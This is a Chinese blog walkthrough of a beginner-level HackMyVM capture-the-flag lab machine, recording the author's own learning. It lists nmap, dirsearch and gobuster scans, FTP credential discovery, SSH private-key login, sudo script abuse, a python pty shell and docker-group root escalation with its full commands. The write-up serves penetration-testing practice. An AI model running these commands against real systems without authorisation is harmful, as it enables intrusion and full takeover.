赞
踩
简介:HackMyVm是一个集合了大量靶机的平台,通过下载压缩包后导入Vm虚拟机来使用,推荐使用VirtualBox来导入加载漏洞虚拟机。类似于Vulnhub、HackTheBox,但是相比于Vulnhub而言,其文件所占空间要小的多,而且从靶机中取得的flag可以直接通过HackMyVm提交
靶机连接:HackMyVM
靶机难度:简单
目录
使用nmap进行网段存活扫描 nmap -sn 192.168.29.0/24 靶机ip:192.168.29.150
对靶机进行端口 web服务扫描 nmap -sV -A -sS -p- -T4 192.168.29.150 开启了21、22、80端口先对web服务进行访问
dirsearch -u http://192.168.29.150/ --random-agent -i 200 301 对网站进行目录扫描访问robots.txt
发现并没有什么有用的东西使用大字典在进行扫描一便,发现了hidden_text
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.29.150
发现了很多路径,逐个进行访问在/pwned.vuln目录下查看源码得到了ftp账号和密码
使用得到的账户密码进行ftp登录,在share目录下有两个文件把他get下来查看
查看我们刚刚下载的文件,在id_rsa中发现ssh的私钥 note.txt中发现了账户,这里我们可以使用ssh私钥登录
由于我们重ftp上下载的文件它默认保存的是之前的文件权限所有我们在利用的时候需要进行赋权
ssh ariana@192.168.29.150 -i id_rsa
在当前目录下发现了第一个flag,使用sudo -l查看一下用户和文件的权限
发现有个sh文件不需要selena用户的认证,但是这里我们无法编辑文件写shell
这里我们使用selena这个用户执行一个这个脚本
用户名:selena
解释器:/bin/bash
进入成功后我们使用python切换到交互shell
python3 -c "import pty;pty.spawn('/bin/bash')";
切换到selena用户目录下查看uses2文件得到第二个flag
查看用户权限发现属于docker组 使用命令查看镜像 docker images
发现存在镜像这里可以使用挂载docker镜像来进行提权
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
最后成功得到root权限得到最后一个flag,至此渗透结束!!!
1.gobuster的使用扫描挺快
2.ssh私钥登录
3.docker逃逸进行提权
后言:刚入门网安的一只小白,想把自学的学习的过程记录下来方便自己,帮助他人。可以私信博主欢迎学习交流!!!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。